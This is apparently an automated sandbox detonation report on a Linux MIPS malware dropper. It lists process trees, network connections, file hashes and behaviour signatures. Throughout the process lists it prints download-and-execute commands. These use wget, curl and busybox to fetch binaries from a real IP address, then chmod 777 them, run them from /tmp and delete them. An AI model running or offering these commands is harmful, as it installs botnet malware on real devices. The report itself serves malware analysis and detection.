[wget http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]
/bin/chmod
[chmod 777 ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]
/tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe
[./ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]
/bin/rm
[rm ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]
/usr/bin/wget
[wget http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]
/bin/chmod
[chmod 777 giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]
/tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw
[./giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]
/bin/rm
[rm giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]
/usr/bin/wget
[wget http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]
/bin/chmod
[chmod 777 KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]
/tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp
[./KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]
/bin/rm
[rm KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]
/usr/bin/wget
[wget http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]
/bin/chmod
[chmod 777 EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]
/tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK
[./EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]
/bin/rm
[rm EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]
/usr/bin/wget
[wget http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]
/bin/chmod
[chmod 777 FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]
/tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy
[./FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]
/bin/rm
[rm FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]
/usr/bin/wget
[wget http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]
/bin/chmod
[chmod 777 KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]
/tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X
[./KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]
/bin/rm
[rm KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]
/usr/bin/wget
[wget http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]
/bin/chmod
[chmod 777 hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]
/tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR
[./hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]
/bin/rm
[rm hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]
/usr/bin/wget
[wget http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]
/bin/chmod
[chmod 777 rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]
/tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b
[./rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]
/bin/rm
[rm rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]
/usr/bin/wget
[wget http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]
/bin/chmod
[chmod 777 6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]
/tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w
[./6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]
/bin/rm
[rm 6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]
/usr/bin/wget
[wget http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]
/bin/chmod
[chmod 777 xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]
/tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda
[./xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]
/bin/rm
[rm xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-10 01:07
Reported
2024-11-10 01:09
Platform
debian9-mipsel-20240611-en
Max time kernel
69s
Max time network
71s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR | /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR | N/A |
| N/A | /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b | /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b | N/A |
| N/A | /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy | /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy | N/A |
| N/A | /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X | /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X | N/A |
| N/A | /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w | /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w | N/A |
| N/A | /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda | /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda | N/A |
| N/A | /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs | /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs | N/A |
| N/A | /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM | /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM | N/A |
| N/A | /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C | /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C | N/A |
| N/A | /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp | /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp | N/A |
| N/A | /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK | /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK | N/A |
| N/A | /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE | /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE | N/A |
| N/A | /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe | /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe | N/A |
| N/A | /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw | /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw | N/A |
| N/A | /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM | /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM | N/A |
| N/A | /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C | /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C | N/A |
| N/A | /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs | /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs | N/A |
| N/A | /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE | /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE | N/A |
| N/A | /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe | /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe | N/A |
| N/A | /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw | /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw | N/A |
| N/A | /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp | /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp | N/A |
| N/A | /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK | /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK | N/A |
| N/A | /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy | /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy | N/A |
| N/A | /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X | /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X | N/A |
| N/A | /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR | /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR | N/A |
| N/A | /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b | /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b | N/A |
| N/A | /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w | /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w | N/A |
| N/A | /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda | /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X | /usr/bin/curl | N/A |
| File opened for modification | /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK | /usr/bin/curl | N/A |
Processes
/tmp/183a2ccc798f2b45c7dd21be4a9866112342cb9428136cb6ff80a522965dbf1d.sh
[/tmp/183a2ccc798f2b45c7dd21be4a9866112342cb9428136cb6ff80a522965dbf1d.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]
/bin/chmod
[chmod 777 hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]
/tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR
[./hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]
/bin/rm
[rm hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]
/usr/bin/wget
[wget http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]
/bin/chmod
[chmod 777 rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]
/tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b
[./rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]
/bin/rm
[rm rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]
/usr/bin/wget
[wget http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]
/bin/chmod
[chmod 777 FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]
/tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy
[./FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]
/bin/rm
[rm FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]
/usr/bin/wget
[wget http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]
/bin/chmod
[chmod 777 KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]
/tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X
[./KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]
/bin/rm
[rm KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]
/usr/bin/wget
[wget http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]
/bin/chmod
[chmod 777 6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]
/tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w
[./6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]
/bin/rm
[rm 6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]
/usr/bin/wget
[wget http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]
/bin/chmod
[chmod 777 xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]
/tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda
[./xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]
/bin/rm
[rm xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]
/usr/bin/wget
[wget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/bin/chmod
[chmod 777 DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]
/tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs
